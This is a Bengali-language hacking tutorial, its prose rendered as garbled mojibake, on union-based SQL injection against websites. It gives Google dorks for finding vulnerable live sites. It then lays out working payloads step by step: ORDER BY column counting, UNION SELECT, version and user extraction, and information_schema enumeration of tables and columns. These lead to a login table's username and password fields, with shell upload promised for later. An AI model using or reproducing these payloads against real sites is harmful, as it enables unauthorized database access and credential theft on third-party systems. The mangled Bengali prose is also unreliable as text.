SQL INJECTION (Union Based SQLi)
āϏāĻŦাāĻ āĻāĻļা āĻāϰি āĻাāϞো āĻāĻেāύ।
(āĻāĻ āĻিāĻāĻোāϰিā§াāϞāĻি āĻļুāϧুāĻŽাāϤ্āϰ āĻļিāĻ্āώāύীā§ āĻāĻĻ্āĻĻ্āϝেāĻļ্āϝে āϞেāĻা āĻšā§েāĻে)
āĻāĻāύ āĻĨেāĻে āĻāĻŽি SQL INJECTION āύিā§ে āύিā§āĻŽিāϤ āĻিāĻāύ āϞেāĻাāϰ āĻেāώ্āĻা āĻāϰāĻŦো।
āĻāĻāĻে āĻāĻŽি āĻāĻĒāύাāĻĻেāϰ āϏাāĻĨে āĻŦেāϏিāĻ āĻāĻāύিā§āύ āĻŦেāĻāĻĄ SQL INJECTION
āĻিāĻাāĻŦে āĻāϰা āĻšā§ āϏেāĻা āĻĻেāĻাāĻŦো।
āĻāĻŦং āĻŦিāϏ্āϤাāϰিāϤ āĻāϞোāĻāύা āĻāϰাāϰ āĻেāώ্āĻা āĻāϰāĻŦো āĻāĻļা āĻāϰি āϧৈāϰ্āϝ āϏāĻšāĻাāϰে āĻĒā§āĻŦেāύ।
- SQL INJECTION āĻি?
SQL INJECTION āĻšāĻ্āĻে āĻŦāϰ্āϤāĻŽাāύ āϏāĻŽā§েāϰ āĻā§েāĻŦāϏাāĻāĻ āĻš্āϝাāĻিং āϏāĻŦāĻেā§ে āĻāύāĻĒ্āϰিā§ āĻāĻŦং
āĻāĻŽāύ āĻŽেāĻĨāĻĄ/āĻĒāĻĻ্āϧāϤি।
āĻāϏāϞে SQL INJECTION āĻšāĻ্āĻে āϤেāĻŽāύ āĻāĻ িāύ āĻিāύিāϏ āύা āϤāĻŦে
āĻāĻা āĻাāϞোāĻাāĻŦে āĻļিāĻāϤে āĻšāϞে,
āĻāĻাāϰ āĻĒিāĻāύে āĻāĻĒāύাāϰ āĻ
āύেāĻ āϏāĻŽā§ āĻĻেāĻā§া āϞাāĻāĻŦে।
āĻিāύ্āϤু āĻš্āϝাāĻিং āĻ āύāϤুāύ āĻāĻŽāύ āĻ
āύেāĻ Newbiee āĻš্āϝাāĻাāϰ āĻŽāύে āĻāϰে āϝে SQL INJECTION āĻোāύো āĻŦāĻĄ āĻŦ্āϝাāĻĒাāϰ āύাāĻš
āĻাāϰāĻŖ āϤাāϰা āĻুāĻŦ āϏāĻšāĻেāĻ āĻŦিāĻিāύ্āύ āĻুāϞāϏ(Havij,Sqlmap,Sqlninja) āĻāϤ্āϝাāĻĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে SQL INJECTION āĻāϰāϤে āĻĒাāϰে।
āĻিāύ্āϤু SQL INJECTION āĻāĻŽāύ āĻāĻāĻা āĻিāύিāϏ āϝেāĻা āϏāĻŽ্āĻĒāϰ্āĻে āĻāĻĒāύাāϰ āϏāĻŽ্āĻĒূāϰ্āĻŖ āĻļিāĻāϤে āĻšāϞে āĻ
āύেāĻ āĻŦāĻ āĻļেāώ āĻāϰা āϞাāĻāĻŦে
āĻāϰ āĻŽাāύে āĻŦোāĻা āĻেāϞো āϝে āĻļুāϧুāĻŽাāϤ্āϰ āĻুāϞāϏ āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে āĻāĻĒāύি āĻ
āύেāĻ āϏাāĻāĻ āĻিāύ্āϤু SQL INJECTION āĻāϰāϤে āĻĒাāϰāĻŦেāύ।
āĻিāύ্āϤু āϤাāϰ āĻĻ্āĻŦাāϰা āĻāϏāϞেāĻ āĻোāύো āϞাāĻ āĻšāĻŦে āύা।
āĻাāϰāĻŖ āĻāĻĒāύি āĻিāĻুāĻ āĻļিāĻāϤে āĻĒাāϰāĻŦেāύ āύা।
āĻāĻŦং āĻ
āύেāĻ āϏāĻŽā§ āĻুāϞāϏ āĻĻিā§েāĻ SQL INJECTION āĻāϰ āĻāύ্āϝে āĻĻুāϰ্āĻŦāϞ/āĻুāϞāύাāϰেāĻŦāϞ āϏাāĻāĻ āĻš্āϝাāĻ āĻāϰāϤে āĻĒাāϰāĻŦেāύ āύা।
āϝাā§ āĻšোāĻ।
- SQL INJECTION āĻĻ্āĻŦাāϰা āĻি āĻি āĻāϰāϤে āĻĒাāϰāĻŦেāύ āĻāĻĒāύি?
- āĻāĻĒāύি āĻĄাāĻাāĻŦেāϏে āϤāĻĨ্āϝ āϤে āĻāĻ্āϏেāϏ āύিāϤে āĻĒাāϰāĻŦেāύ।
- āĻāĻĒāύি āĻĄাāĻাāĻŦেāϏেāϰ āϤāĻĨ্āϝ āĻŽোāĻĄিāĻĢাāĻ āĻāϰāϤে āĻĒাāϰāĻŦেāύ।
- āĻāĻĒāύি āϏাāĻāĻেāϰ āϞāĻāĻāύ āĻāϰিā§া āĻŦাāĻāĻĒাāϏ āĻāϰāϤে āĻĒাāϰāĻŦেāύ।
- āĻāĻĒāύি SQL Server āĻš্āϝাāĻ āĻāϰāϤে āĻĒাāϰāĻŦেāύ।
āϤাāĻšāϞে āĻļুāϰু āĻāϰা āϝাāĻ।
āĻĒ্āϰāĻĨāĻŽāϤ āĻāĻŽাāĻĻেāϰ SQL INJECTION āĻāϰ āĻāύ্āϝে āĻুāϞāύাāϰāĻŦāϞ āϏাāĻāĻ āĻŦেāϰ āĻāϰāϤে āĻšāĻŦে।
āϝāĻĻি āĻāĻĒāύি āĻš্āϝাāĻাāϰ āĻšāύ,āϤাāĻšāϞে āĻāĻĒāύি āĻাāϞো āĻāϰেāĻ āĻাāύāĻŦেāύ āϝে āϏাāϰ্āĻ āĻāĻ্āĻিāύ āĻšāϞো āĻš্āϝাāĻাāϰāĻĻেāϰ
āϏāĻŦāĻেā§ে āĻŦেāϏ্āĻ āĻĢ্āϰেāύ্āĻĄ।āĻāĻŽāϰা SQL INJECTION āĻুāϞāύাāϰāĻŦāϞ āϏাāĻāĻ GOOGLE Dork
āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে āĻŦেāϰ āĻāϰāϤে āĻĒাāϰāĻŦো।
āύিāĻে āĻāĻŽি āĻিāĻু āĻāĻŽāύ SQL INJECTION Dork āĻĻিāĻ্āĻিঃ
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=
Dork āĻāϰো āĻ
āύেāĻ āĻŦāĻĄ āĻŦিāĻļাāϞ āϞিāϏ্āĻ āĻāĻে। āĻĒāϰে āĻোāύো āĻāĻ āϏāĻŽā§ āĻļেā§াāϰ āĻāϰāĻŦো।
āĻ
āĻĨāĻŦা āĻāĻĒāύি āĻুāĻāϞ āĻĨেāĻে āϏাāϰ্āĻ āĻāϰে āĻŦেāϰ āĻāϰে āύিāϤে āĻĒাāϰেāύ।
āĻāĻāύ āĻāĻĒāύি āĻāĻাāύ āĻĨেāĻে āϝেāĻোāύো āĻāĻāĻি Dork āύিā§ে āĻুāĻāϞে āϏাāϰ্āĻ āĻĻিāϞে
āϰেāϏাāϞ্āĻে āĻ
āύেāĻ āϏাāĻāĻ āĻĻেāĻāϤে āĻĒাāĻŦেāύ।
āϏেāĻাāύ āĻĨেāĻে āϝেāĻোāύো āĻāĻāĻি āϏাāĻāĻে āĻĒ্āϰāĻŦেāĻļ āĻāϰুāύ।
āĻŽāύে āĻāϰুāύ āĻāϰāĻāĻŽ āĻāĻāĻি āϏাāĻāĻ āĻĒেāϞেāύ āĻāĻĒāύি (āĻāĻĻাāĻšাāϰāĻŖ)
website.com/index.php?id=1
āĻāĻ āĻāĻāĻāϰāĻāϞ āĻি āĻ
āύেāĻ āϰāĻāĻŽেāϰ āĻšāϤে āĻĒাāϰে। āϤāĻŦে āĻāĻŽি āĻāĻĻাāĻšাāϰāĻŖেāϰ āĻāύ্āϝে āĻāĻি āĻĻেāĻাāϞাāĻŽ।
āĻāĻāύ āĻāĻŽāϰা āĻেāϏ্āĻ āĻāϰāĻŦো āϏাāĻāĻāĻি SQL INJECTION āĻুāϞāύāϰাāĻŦāϞ āĻিāύা।
āϤাāϰ āĻāύ্āϝে āĻāĻŽি āϏাāĻāĻেāϰ āĻļেāώে āĻāĻ (') āĻিāĻš্āύāĻি āĻĻিāĻŦো (āĻŦ্āϰাāĻেāĻেāϰ āĻŽাāĻāĻাāύেāϰ āĻিāĻš্āύāĻি)
āĻāĻĻাāĻšাāϰāĻŖঃ
website.com/index.php?id=1'
āĻāĻāύ āϝāĻĻি āϏাāĻāĻি SQL INJECTION āĻāϰ āĻāύ্āϝে āĻুāϞāύাāϰāĻŦāϞ āĻšā§ āϤাāĻšāϞে
āĻāĻĒāύি āĻāϰāĻāĻŽ āĻিāĻু āĻāϰāϰ āĻĻেāĻāϤে āĻĒাāĻŦেāύ।
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
āĻ
āĻĨāĻŦা,
Warning: mysql_fetch_array()
āĻ
āĻĨāĻŦা āĻāĻĒāύি āϝāĻĻি āĻোāύো āϰāĻāĻŽেāϰ mysql āĻāϰāϰ āĻĻেāĻāϤে āĻĒাāύ।
āĻ
āĻĨāĻŦা āϝāĻĻি āϏেāĻ āĻā§েāĻŦ āĻĒেāĻāĻ āĻĨেāĻে āĻোāύো āĻĄাāĻা āĻŽিāϏ āĻāϰে āϤাāĻšāϞে āĻŦুāĻāϤে āĻšāĻŦে
āϏাāĻāĻāĻি SQL INJECTION āĻুāϞāύāϰাāĻŦāϞ।
āϝāĻĻি āĻāϏāĻŦেāϰ āĻিāĻু āύা āĻšā§ āϤাāĻšāϞে āϏাāĻāĻāĻি āĻুāϞāύাāϰāĻŦāϞ āύাāĻš!
āĻ
āύ্āϝ āĻāϰেāĻāĻি āϏাāĻāĻ āĻুāĻুāύ।
āĻāϰāϰ āĻĒাāĻā§াāϰ āĻĒāϰে āĻāĻāύ āĻāĻŽাāĻĻেāϰ āĻাāĻ āĻšāĻŦে āϏাāĻāĻāĻি āĻি āĻāĻ্āϏāĻĒ্āϞāĻāĻিং āĻāϰাāϰ ।
āĻŽাāύে SQL INJECTION āĻāϰāϤে āĻšāĻŦে।
āĻāĻŽāϰা āĻāϤāĻ্āώāύ āĻুāϞāύাāϰāĻŦāϞ āϏাāĻāĻ āĻŦেāϰ āĻāϰāϞাāĻŽ,āĻāĻāύ āĻāĻŽাāĻĻেāϰ āĻাāĻ āĻšāĻŦে āϏাāĻāĻāĻি āĻĨেāĻে āĻĄাāĻা
āĻĄাāĻŽ্āĻĒ āĻāϰা āĻŦা āĻš্āϝাāĻ āĻāϰা।
āĻāĻāύ āĻāĻŽাāĻĻেāϰ āĻĒāϰāĻŦāϰ্āϤী āĻĒāĻĻāĻ্āώেāĻĒ āĻšāĻŦে āĻāĻ āĻĄাāĻাāĻŦেāϏেāϰ āĻেāĻŦিāϞে āĻāϞাāĻŽেāϰ āϏংāĻ্āϝা āĻāϤো āϏেāĻা āĻŦেāϰ āĻāϰা।
āϏেāĻāύ্āϝে āĻāĻŽāϰা ' āĻিāĻš্āύ āĻি order by statement āĻ āĻĒāϰিāĻŦāϰ্āϤāύ āĻāϰāĻŦো।
āĻāĻĻাāĻšাāϰāĻŖঃ
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--
āĻāĻŽাāĻĻেāϰ order by āĻāϰ āύাāĻŽ্āĻŦাāϰ āĻি āĻŦাāĻĄিā§ে āϝেāϤে āĻšāĻŦে āϝāϤāĻ্āώāύ āύা āĻāĻŽāϰা
āϏাāĻāĻāĻি āϤে āĻোāύো āĻāϰāϰ āĻĻেāĻāϤে āύা āĻĒাā§।
āĻāϰāϰ āĻ
āύেāĻāĻা āĻāϰāĻāĻŽ āĻšāϤে āĻĒাāϰে,
unknown column numbers
āĻ
āĻĨāĻŦা
āϏাāĻāĻেāϰ āĻিāĻু āĻĄাāĻা āĻŽিāϏ āĻšāϤে āĻĒাāϰে।
āĻāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=20 order by 1-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 2-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 3-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 10-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 20-- NO ERROR
http://www.exaplme.sqlsite.com/page.php?id=20 order by 21-- ERROR āϏাāĻāĻেāϰ āĻāύāĻেāύ্āĻ āĻŽিāϏ āĻšāĻ্āĻে।
āĻāĻāύ āĻāĻŽাāϰা order by 21 āĻĒāϰ্āϝāύ্āϤ āĻāϏাāϰ āĻĒāϰ error āĻĻেāĻāϤে āĻĒেāϞাāĻŽ।
āĻিāύ্āϤু order by 20 āĻĻিāϞে āĻোāύো āĻāϰāϰ āύেāĻ।
āϤাāϰ āĻŽাāύে āĻĄাāĻাāĻŦেāϏে ⧍ā§Ļ āĻি āĻāϞাāĻŽ āĻāĻে।
āĻ
āύেāĻ āϏāĻŽā§ order by 1000 āĻĻিāϞেāĻ āĻāϰāϰ āĻāϏে āύাāĻš।
āϏে āĻ্āώেāϤ্āϰে id / parameter āĻāϰ āĻļেāώে ' āĻিāĻš্āύ āĻি āĻĻিāϤে āĻšā§
āĻāĻŦং āĻļেāώে āĻāĻāĻি + āϝোāĻ āĻāϰāϤে āĻšā§।
āĻāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=20' order by 21--+
āĻāĻāύ āĻāĻŽাāĻĻেāϰ āĻাāύা āĻāĻে āϝে āĻāĻ āĻĄাāĻাāĻŦেāϏে ⧍ā§ĻāĻি āĻāϞাāĻŽ āĻāĻে।
āĻāĻāύ āĻāĻŽাāĻĻেāϰ āĻাāĻ āĻšāĻŦে āϏāĻŦ āĻāϞাāĻŽ āϏিāϞেāĻ্āĻ āĻāϰা union select statement āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে।
select statement āĻি Data āĻĻেāĻাāϰ āĻāύ্āϝে āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰা āĻšā§।
āϝাā§ āĻšোāĻ āĻāϰ āĻĒāϰ্āϝাā§ে āĻāĻŽāϰা āĻāĻ āĻোāĻĄāĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰāĻŦো।
http://www.exaplme.sqlsite.com/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
āĻāĻāύ āĻāĻŽāϰা āĻā§েāĻŦ āĻĒেāĻāĻে āĻিāĻু āύাāĻŽ্āĻŦাāϰ āĻĻেāĻāϤে āĻĒাāĻŦো।
āύāĻŽ্āĻŦāϰ āĻুāϞো ā§§-⧍ā§Ļ āĻāϰ āĻŽāϧ্āϝে āĻšāĻŦে āĻাāϰāĻŖ āĻāĻŽāϰা āĻাāύি āĻāĻ āϏাāĻāĻেāϰ āĻāϞাāĻŽ ⧍ā§Ļ āĻি।
āĻāϰ āĻāĻŽāϰা āϝে āĻāĻŽাāύ্āĻĄāĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰেāĻি āϏেāĻা āĻĻিā§ে ⧍ā§ĻāĻি āĻāϞাāĻŽেāϰ āĻŽāϧ্āϝে āĻোāύāĻি
String āĻāϞাāĻŽ āϏেāĻা āĻŦেāϰ āĻāϰাāϰ āĻāύ্āϝে āĻāĻ āĻāĻŽাāύ্āĻĄ āĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰেāĻি।
āϝāĻĻি āĻāĻĒāύি āĻোāύো āύাāĻŽ্āĻŦাāϰ āĻĻেāĻāϤে āύা āĻĒাāύ āϤাāĻšāϞে
parameter value āĻāϰ āĻāĻে āĻāĻāĻি - āĻিāĻš্āύ āĻĻেāύ।
āĻāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
āĻāĻĒāύি āĻā§েāĻŦāĻĒেāĻāĻে āĻিāĻু āύাāĻŽ্āĻŦাāϰ āĻĻেāĻāϤে āĻĒাāĻŦেāύ।
āĻāĻŽি ā§Š,ā§Ē āĻĻেāĻāϤে āĻĒেāϞাāĻŽ।
āĻāĻ āĻĻুāĻāĻা āĻšāϞো String Column āĻāĻŽāϰা āĻĄাāĻাāĻŦেāϏ āĻĨেāĻে āϤāĻĨ্āϝ āĻš্āϝাāĻ āĻāϰāϤে āĻĒাāϰāĻŦো
āĻāĻ āĻĻুāĻāĻি āĻāϞাāĻŽ āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে।
āĻ
āύেāĻ āϏāĻŽā§ āĻāĻĒāϰে āϝে āĻāĻŽাāύ্āĻĄāĻি āύিā§ে āϞেāĻেāĻি āϏেāĻা āĻাāĻ āĻāϰে āύাāĻš
āϏে āĻ্āώেāϤ্āϰে āĻāĻŽāϰা āĻāϰāϰ āĻĻেāĻāϤে āĻĒাāĻŦো।
āĻāĻ āĻ্āώেāϤ্āϰে waf bypass āĻāϰāϤে āĻšāĻŦে।
āϏেāĻা āϏāĻŽ্āĻĒāϰ্āĻে āϏাāĻŽāύেāϰ āĻিāĻāĻোāϰিā§াāϞ āĻুāϞোāϤে āĻāϞোāĻāύা āĻāϰāĻŦো।
āĻāĻāύ āĻāĻŽাāĻĻেāϰ āĻাāĻ āĻĄাāĻাāĻŦেāϏ āĻĨেāĻে āĻĄাāĻা āĻš্āϝাāĻ āĻāϰা।
āĻāĻŽāϰা āĻāĻāύ āĻĄাāĻাāĻŦেāϏেāϰ āϏংāϰāĻ্āώিāϤ āĻোāĻĒāύ āĻĄাāĻা āĻুāϞো āĻš্āϝাāĻ āĻāϰāϤে āĻĒাāϰāĻŦো।
āĻāĻাāĻĄাāĻ āĻāĻŽāϰা āĻĄাāĻাāĻŦেāϏেāϰ āύাāĻŽ database() āĻāĻ āĻāĻŽাāύ্āĻĄ āĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে,
āĻĄাāĻাāĻŦেāϏ āĻাāϰ্āϏāύ āĻাāύāϤে version() āĻāĻ āĻāĻŽাāύ্āĻĄāĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে āĻŦেāϰ āĻāϰāϤে āĻĒাāϰāĻŦো।
āĻāĻাāĻĄাāĻ āĻāĻŽāϰা SQL INJECTION āĻāϰ āĻŽাāϧ্āϝāĻŽে āϞোāĻĄ āĻĢাāĻāϞ āĻŽেāĻĨāĻĄ āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে
āĻুāϞāύāϰাāĻŦāϞ āϏাāĻāĻে āĻļেāϞ āĻāĻĒāϞোāĻĄ āĻĻিāϤে āĻĒাāϰāĻŦো (āĻāĻ āĻŦিāώā§ে āĻĒāϰে āĻিāĻāĻোāϰিā§াāϞ āϞেāĻা āĻšāĻŦে)
āĻāĻ āĻিāĻāĻোāϰিā§াāϞ āĻি āϤে āĻāĻŽāϰা āĻĄাāĻাāĻŦেāϏ āĻāĻāĻাāϰ āύেāĻŽ āĻāĻŦং āĻĄাāĻাāĻŦেāϏ āĻাāϰ্āϏāύ āĻŦেāϰ āĻāϰāĻŦো,
ā§Š āĻāĻŦং ā§Ē āύāĻŽ্āĻŦāϰ String āĻāϞাāĻŽ āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে।
āĻāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
āĻāĻŽি āĻāĻাāύে 0x3a āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰেāĻি āĻāĻা āĻšāϞো āϏেāĻŽিāĻোāϞāύ (;) āĻāϰ āĻšেāĻ্āϏ āĻ্āϝাāϞু
āĻāĻা āĻĻুāĻāĻা āĻĄিāĻĢাāϰেāύ্āĻ āĻ্āϝাāϞু āĻে āĻĄিāĻĢাāϰেāύ্āĻ āĻĒ্āϝাāϰাāĻŽিāĻাāϰ āĻ āϏেāĻĒাāϰেāĻ āĻāϰে āĻĻেāĻাāĻŦে।
āĻāĻāύ āĻĻেāĻা āϝাāĻŦে āϝে ā§Š āĻāϰ ā§Ē āύāĻŽ্āĻŦāϰ āĻুāϞāύাāϰāĻŦāϞ āϏাāĻāĻেāϰ āĻাā§āĻাā§ āĻĄাāĻাāĻŦেāϏ āĻাāϰ্āϏāύ āĻāĻŦং
āĻĄাāĻাāĻŦেāϏেāϰ āĻāĻāĻাāϰেāϰ āύাāĻŽ āĻĻেāĻাāĻŦে।
āĻāĻāύ āĻāĻŽāϰা āĻুāϞāύাāϰāĻŦāϞ āϏাāĻāĻেāϰ āϝে āϝে āĻĄাāĻাāĻŦেāϏ āϏেāĻা āĻŦেāϰ āĻāϰāĻŦো।
āϤাāϰ āĻāύ্āϝে āĻāĻŽাāĻĻেāϰ āĻāϞাāĻŽ āύেāĻŽেāϰ āĻাā§āĻাā§ SQL QUERY āĻĻিā§ে āϰিāĻĒ্āϞেāϏ āĻāϰāϤে āĻšāĻŦে।
āĻāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--
āĻāĻāύ āĻāĻŽāϰা āĻĻুāĻāĻা āĻĄাāĻাāĻŦেāϏ āĻĻেāĻāϤে āĻĒাāĻŦো
āĻāĻāĻি information_schema āĻāϰেāĻāĻি site_database āĻāĻা āϏাāĻāĻ āĻāĻĄāĻŽিāύ āϝে āύাāĻŽে āĻĻিā§েāĻে āϏে āύাāĻŽে āĻšāĻŦে
āĻāĻāύ information_schema āύিā§ে āĻāĻŽাāĻĻেāϰ āĻোāύো āĻাāĻ āύেāĻ āĻাāϰāĻŖ
āĻাāϰāĻŖ information_schema āϤে āϏিāϏ্āĻেāĻŽ āĻেāĻŦিāϞ āĻĨাāĻে āϝা āĻĄাāĻাāĻŦেāϏ āĻে āĻĄিāĻĢাāĻāύ āĻāϰে।
āĻāĻŽāϰা āĻāĻ āĻেāĻŦিāϞ āĻুāϞো āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে āĻĄাāĻাāĻŦেāϏেāϰ āϞে-āĻāĻāĻ āϏ্āĻাāĻāϞ āĻেāĻ āĻāϰāϤে āĻĒাāϰāĻŦো।
āϝাā§ āĻšোāĻ āĻāĻāĻুāϞা āĻ
āύেāĻ āĻāĻĄāĻাāύ্āϏ āϞেāĻেāϞেāϰ āĻāĻĨা āĻŦাāϰ্āϤা āϞোāϞ :p
āϝা āĻāĻāύ āĻāĻĒāύাāϰা āĻŦুāĻāϤে āĻĒাāϰāĻŦেāύ āύা।
āĻāĻāύ āĻāĻŽাāĻĻেāϰ āĻাāĻে āĻĄাāĻাāĻŦেāϏ āĻāĻে (āĻāϏāϞে āĻāĻŽাāĻĻেāϰ āĻĄাāĻাāĻŦেāϏেāϰ āύাāĻŽ āĻেāĻ āĻāϰাāϰ āĻĻāϰāĻাāϰ āĻিāϞো āύা
āĻāĻŽি āĻļুāϧু āĻļেāĻাāϰ āĻāĻĻ্āĻĻেāĻļ্āϝে āϏেāĻ āĻŦিāώā§ে āĻŦāϞāϞাāĻŽ।āĻāĻŽāϰা āϝāĻĻি āϏাāĻāĻেāϰ āĻĄাāĻাāĻŦেāϏ āĻĨেāĻে āĻĄাāĻা āĻš্āϝাāĻ āĻāϰāϤে āĻাā§
āϤাāĻšāϞে āĻāĻŽāϰা āĻĄাāĻাāĻŦেāϏ āĻĢাংāĻļāύ āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰেāĻ āĻĄাāĻা āĻĄাāĻŽ্āĻĒ āĻāϰāϤে āĻĒাāϰি।
āϏে āĻ্āώেāϤ্āϰে site_database āĻāϰ āύাāĻŽ āĻাāύাāϰ āĻāϰ āĻĻāϰāĻাāϰ āĻšāĻŦে āύা।
āĻāĻŽāϰা āĻāĻ āĻিāĻāĻোāϰিā§াāϞে database() āĻāĻ āĻĢাংāĻļāύ āĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে āĻĄাāĻা āĻš্āϝাāĻ āĻāϰāĻŦো।)
āĻāĻāύ āĻāĻŽāϰা āĻĄাāĻাāĻŦেāϏ āĻĨেāĻে āĻেāĻŦিāϞāϏ āĻŦেāϰ āĻāϰāĻŦো।
āĻāĻāύ āĻāĻŽāϰা where āĻāύ্āĻĄিāĻļāύ āĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰāĻŦো āĻāĻ query āϤে।
āĻāĻŽāϰা āĻেāĻŦিāϞāϏ āύেāĻŽ āĻŦেāϰ āĻāϰāĻŦো select statement āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰে
āĻāĻŦং where āĻāύ্āĻĄিāĻļāύāĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰāĻŦো āĻāĻা āĻĻেāĻাāύোāϰ āĻāύ্āϝে āĻোāύ āĻĄাāĻাāĻŦেāϏ āĻĨেāĻে āĻāĻŽāϰা āĻেāĻŦিāϞāϏ
āĻŦেāϰ āĻāϰāϤে āĻাāĻ্āĻি।
āĻāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--
āĻāĻāύ āĻāĻĒāύি āĻেāĻŦিāϞāϏ āĻĻেāĻāϤে āĻĒাāĻŦেāύ।
āĻŽāύে āĻāϰেāύ āĻāĻ āĻেāĻŦিāϞāϏ āĻুāϞা āĻāĻŽāϰা āĻĒেāϞাāĻŽ।
- archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit
āĻāĻāύ āĻāĻŽাāĻĻেāϰ āĻĻেāĻāϤে āĻšāĻŦে āĻāĻ āĻুāϞোāϰ āĻŽāϧ্āϝে āϏেāύāϏেāĻিāĻ āĻেāĻŦিāϞ āĻোāύāĻা āϝেāĻাāύে āĻুāϰুāϤ্āĻŦāĻĒূāϰ্āĻŖ āĻĄাāĻা āĻĨাāĻāĻŦে ?
āϏেāĻা āĻšāĻ্āĻে login āĻেāĻŦিāϞ।
āĻāĻ āĻāĻ āĻ্āώেāϤ্āϰে āĻāĻ āĻāĻ āϰāĻāĻŽ āĻšāϤে āĻĒাāϰে āĻেāĻŦিāϞ āύেāĻŽ। āύিāĻেāϰ āĻŦুāĻĻ্āϧি āĻাāĻাāύ!
āĻāĻŽāϰা āĻāĻāύ login āĻেāĻŦিāϞ āĻĨেāĻে āĻĄাāĻা āĻš্āϝাāĻ āĻāϰāĻŦো ।
āĻāĻāύ āĻāĻŽāϰা group_concat(table_name) āĻে group_concat(column_name) āĻāĻŦং information_schema.tables āĻে information_schema.columns
āĻĻিā§ে āϰিāĻĒ্āϞেāϏ āĻāϰāĻŦো āĻāĻŦং table_schema āĻāϰ āĻাā§āĻাā§ table_name āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰāĻŦো।
āĻāĻāύ āĻāĻŽাāϰা table_name āĻে āĻāĻāĻি āĻĒ্āϝাāϰাāĻŽিāĻাāϰ āĻĻিāĻŦো āĻেāĻŦāϞ āύেāĻŽ āĻি quote āĻ āύিā§ে āĻāϏāĻŦো
table_name='login'
āĻāĻŽāϰা qoute āĻেāύো āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰāϞাāĻŽ??
āĻাāϰāĻŖ āĻāĻাāϰ āĻĄাāĻা āĻাāĻāĻĒ varchar...
āĻ
āύেāĻ āϏāĻŽā§ āĻāĻ āĻĒāĻĻ্āϧāϤি āĻি āĻাāĻ āĻāϰে āύাāĻš...
āϏে āĻ্āώেāϤ্āϰে āĻেāĻŦিāϞ āύাāĻŽ āĻে char āĻ āϰুāĻĒাāύ্āϤāϰ āĻāϰāϤে āĻšā§।
āĻāĻা āĻāϰাāϰ āĻāύ্āϝে āĻŽোāĻিāϞা āĻĢাā§াāϰ āĻĢāĻ্āϏে āĻš্āϝাāĻāĻŦাāϰ āύাāĻŽে āĻāĻāĻি āĻāĻĄāĻ
āύ āĻāĻে āĻāĻা āĻāĻĄ āĻāϰে āύিāύ।
āϏāĻšāĻেāϰ char āĻ āϰুāĻĒাāύ্āϤāϰ āĻāϰāϤে āĻĒাāϰāĻŦেāύ।
āĻāĻŽি login table āĻাāĻে char āĻ āϰুāĻĒাāύ্āϤāϰ āĻāϰাāϰ āĻĒāϰ āϏেāĻা āĻšāϞো
CHAR(108, 111, 103, 105, 110)
āĻāĻāύ āĻāĻŽāϰা āĻāĻŽাāύ্āĻĄāĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻিāĻাāĻŦে āĻāϰে āϏেāĻা āĻĻেāĻāĻŦো।
āĻāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--
āĻāĻāύ āĻāĻŽāϰা login āĻেāĻŦিāϞেāϰ āĻāϞাāĻŽ āĻুāϞো āĻĻেāĻāϤে āĻĒাāĻŦে
āĻāĻŽি āϝা āϝা āĻĒেāϞাāĻŽ।
id,username,password,email,date_added,lastlogin,sessionid,type,status
